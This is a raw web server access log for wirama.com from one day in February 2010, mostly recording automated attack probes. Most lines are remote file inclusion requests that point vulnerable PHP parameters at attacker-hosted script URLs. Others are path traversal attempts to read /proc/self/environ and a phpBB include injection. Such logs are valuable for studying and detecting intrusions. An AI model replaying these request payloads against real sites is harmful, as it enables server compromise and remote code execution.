211.39.145.146 - - [01/Feb/2010:09:54:18 -0800] "GET /logs/access_090801.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.clubedasmotocas.com.br/data/data/unit/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.106.182 - - [01/Feb/2010:09:56:31 -0800] "GET /logs/access_090401.log HTTP/1.1" 200 0 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
211.193.131.164 - - [01/Feb/2010:09:57:03 -0800] "GET /logs//config/spaw_control.config.php?spaw_dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:09:57:04 -0800] "GET /config/spaw_control.config.php?spaw_dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:09:57:05 -0800] "GET /logs/access_090329.log%20%20//config/spaw_control.config.php?spaw_dir=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:09:57:35 -0800] "GET /skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:09:57:35 -0800] "GET /logs/access_090801.log%20%20//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:09:57:35 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:10:00:38 -0800] "GET /skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:10:00:45 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:10:00:45 -0800] "GET /logs/access_091101.log//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:10:00:50 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:10:09:09 -0800] "GET /logs/access_090329.log%20%20///image_upload.php?sbp=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.63.235.155 - - [01/Feb/2010:10:09:09 -0800] "GET //image_upload.php?sbp=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.63.235.155 - - [01/Feb/2010:10:09:09 -0800] "GET /logs///image_upload.php?sbp=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.63.235.155 - - [01/Feb/2010:10:12:43 -0800] "GET //image_upload.php?sbp=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.63.235.155 - - [01/Feb/2010:10:12:43 -0800] "GET /logs/access_090329.log%20%20///image_upload.php?sbp=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.63.235.155 - - [01/Feb/2010:10:13:42 -0800] "GET /logs///image_upload.php?sbp=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.98.23.9 - - [01/Feb/2010:10:16:35 -0800] "GET /logs/access_090331.log/spaw/config/spaw_control.config.php?spaw_root=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.98.23.9 - - [01/Feb/2010:10:16:35 -0800] "GET /logs/spaw/config/spaw_control.config.php?spaw_root=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.98.23.9 - - [01/Feb/2010:10:16:35 -0800] "GET /spaw/config/spaw_control.config.php?spaw_root=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:10:17:21 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.98.23.9 - - [01/Feb/2010:10:17:37 -0800] "GET /logs/access_091101.log/spaw/config/spaw_control.config.php?spaw_root=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:10:21:07 -0800] "GET /logs/access_090331.log///image_upload.php?sbp=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:10:21:07 -0800] "GET //image_upload.php?sbp=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:10:21:16 -0800] "GET /logs/access_090601.log///image_upload.php?sbp=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:10:21:18 -0800] "GET /logs/access_090601.log///image_upload.php?sbp=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:10:21:58 -0800] "GET /logs///image_upload.php?sbp=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:10:22:03 -0800] "GET /logs/access_090331.log///image_upload.php?sbp=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:10:22:03 -0800] "GET //image_upload.php?sbp=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:10:22:03 -0800] "GET /logs///image_upload.php?sbp=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:10:22:03 -0800] "GET /logs/access_090330.log%20%20///contact-prof.ru/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.39.145.146 - - [01/Feb/2010:10:22:06 -0800] "GET /logs///contact-prof.ru/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:10:27:16 -0800] "GET /logs//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:10:27:16 -0800] "GET /config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:10:27:16 -0800] "GET /logs/access_090401.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:10:27:16 -0800] "GET /logs/access_090331.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:10:27:49 -0800] "GET /logs/access_090331.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:10:27:49 -0800] "GET /config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:10:27:49 -0800] "GET /logs/access_090401.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:10:27:49 -0800] "GET /logs//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.63.235.155 - - [01/Feb/2010:10:29:03 -0800] "GET /logs/access_090329.log///image_upload.php?sbp=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.234.200.155 - - [01/Feb/2010:10:30:56 -0800] "GET /logs//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "wirama.com"
200.234.200.155 - - [01/Feb/2010:10:30:56 -0800] "GET /skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "wirama.com"
200.234.200.155 - - [01/Feb/2010:10:30:56 -0800] "GET /logs//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "wirama.com"
200.234.200.155 - - [01/Feb/2010:10:30:57 -0800] "GET /skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "wirama.com"
194.63.235.155 - - [01/Feb/2010:10:33:01 -0800] "GET /logs/access_090329.log///image_upload.php?sbp=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:10:34:52 -0800] "GET /logs/access_090329.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:10:34:52 -0800] "GET /config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:10:34:52 -0800] "GET /logs//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:10:35:44 -0800] "GET /logs/access_090329.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:10:35:44 -0800] "GET /logs//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:10:35:44 -0800] "GET /config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:10:38:24 -0800] "GET ///bbs//write_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:10:38:25 -0800] "GET /logs////bbs//write_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:10:38:25 -0800] "GET /logs/access_090330.log////bbs//write_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
208.80.193.35 - - [01/Feb/2010:10:38:32 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; AtHome033; SV1; .NET CLR 1.1.4322)" "wirama.com"
87.239.23.19 - - [01/Feb/2010:10:47:07 -0800] "GET /phpBB2////viewtopic.php?p=777&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.239.23.19 - - [01/Feb/2010:10:47:07 -0800] "GET /logs/access_090329.log//phpBB2////viewtopic.php?p=777&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.239.23.19 - - [01/Feb/2010:10:47:07 -0800] "GET /logs//phpBB2////viewtopic.php?p=777&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:10:49:47 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:10:49:47 -0800] "GET /logs/access_100101.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:10:49:47 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 3941 "-" "Mozilla/5.0" "www.wirama.com"
65.55.104.154 - - [01/Feb/2010:10:52:37 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
65.55.104.154 - - [01/Feb/2010:10:52:40 -0800] "GET / HTTP/1.1" 200 916 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
202.45.154.10 - - [01/Feb/2010:10:52:44 -0800] "GET /logs/access_100101.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.45.154.10 - - [01/Feb/2010:10:52:44 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 3941 "-" "Mozilla/5.0" "www.wirama.com"
202.45.154.10 - - [01/Feb/2010:10:52:44 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
202.45.154.10 - - [01/Feb/2010:10:52:57 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
202.45.154.10 - - [01/Feb/2010:10:52:57 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 3941 "-" "Mozilla/5.0" "www.wirama.com"
202.45.154.10 - - [01/Feb/2010:10:52:57 -0800] "GET /logs/access_100101.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.15 - - [01/Feb/2010:10:53:47 -0800] "GET /logs/access_100101.log/?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:10:53:47 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
77.221.130.15 - - [01/Feb/2010:10:53:47 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 3941 "-" "Mozilla/5.0" "wirama.com"
202.45.154.10 - - [01/Feb/2010:10:53:56 -0800] "GET /logs/access_100101.log/?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.45.154.10 - - [01/Feb/2010:10:53:56 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 3941 "-" "Mozilla/5.0" "wirama.com"
202.45.154.10 - - [01/Feb/2010:10:53:56 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
222.122.158.155 - - [01/Feb/2010:10:54:13 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
222.122.158.155 - - [01/Feb/2010:10:54:13 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
222.122.158.155 - - [01/Feb/2010:10:54:13 -0800] "GET /logs/access_090329.log%20%20//admin/business_inc/saveserver.php?thisdir=http://koreadefence.net/data/.psy/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
202.45.154.10 - - [01/Feb/2010:10:54:37 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
202.45.154.10 - - [01/Feb/2010:10:54:37 -0800] "GET /logs/access_100101.log/?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.45.154.10 - - [01/Feb/2010:10:54:37 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 3941 "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:10:54:58 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:10:54:58 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:10:54:59 -0800] "GET /logs/access_090601.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:10:56:37 -0800] "GET /logs//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:10:56:38 -0800] "GET /config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:10:56:38 -0800] "GET /logs/access_090329.log%20%20//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
87.239.23.19 - - [01/Feb/2010:10:58:00 -0800] "GET /logs/access_090329.log%20%20//phpBB2////viewtopic.php?p=777&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:10:58:29 -0800] "GET /logs//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:10:58:29 -0800] "GET /logs/access_090329.log%20%20//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:10:58:30 -0800] "GET /config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
95.108.150.235 - - [01/Feb/2010:10:59:16 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
95.108.150.235 - - [01/Feb/2010:10:59:17 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
95.108.150.235 - - [01/Feb/2010:10:59:18 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
95.108.150.235 - - [01/Feb/2010:10:59:19 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.wirama.com"
95.108.150.235 - - [01/Feb/2010:10:59:20 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
95.108.150.235 - - [01/Feb/2010:10:59:21 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; H)" "wirama.com"
211.39.145.146 - - [01/Feb/2010:11:01:37 -0800] "GET /logs/access_100101.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:11:02:16 -0800] "GET /config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:11:02:16 -0800] "GET /logs/access_090331.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:11:02:16 -0800] "GET /logs//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:11:02:18 -0800] "GET /include/prodler.class.php?sPath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.110.160.78 - - [01/Feb/2010:11:02:18 -0800] "GET /logs/access_091101.log/include/prodler.class.php?sPath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.110.160.78 - - [01/Feb/2010:11:02:18 -0800] "GET /logs/access.log/include/prodler.class.php?sPath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
194.110.160.78 - - [01/Feb/2010:11:02:18 -0800] "GET /logs/include/prodler.class.php?sPath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:11:02:41 -0800] "GET /logs/access_090401.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:11:03:24 -0800] "GET /include/prodler.class.php?sPath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:11:03:24 -0800] "GET /logs/include/prodler.class.php?sPath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:11:03:24 -0800] "GET /logs/access_091101.log/include/prodler.class.php?sPath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:11:03:45 -0800] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:11:03:45 -0800] "GET /bbs/include/print_category.php?setup[use_category]=1&dir=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:11:03:45 -0800] "GET /logs/access_091101.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:11:03:56 -0800] "GET /config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:11:03:56 -0800] "GET /logs/access_090331.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.39.145.146 - - [01/Feb/2010:11:03:56 -0800] "GET /logs/access_100101.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.cucmall.com//image/grafity/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:11:03:56 -0800] "GET /logs//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.233.3.101 - - [01/Feb/2010:11:04:06 -0800] "GET /logs/access_090401.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.110.160.78 - - [01/Feb/2010:11:04:50 -0800] "GET /logs/access_091201.log/include/prodler.class.php?sPath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.251.225.152 - - [01/Feb/2010:11:05:55 -0800] "GET /include/prodler.class.php?sPath=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../id?? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.wirama.com"
87.239.23.19 - - [01/Feb/2010:11:08:11 -0800] "GET /logs/access_090330.log//phpBB2////viewtopic.php?p=777&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:11:09:08 -0800] "GET /logs/access_090329.log//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
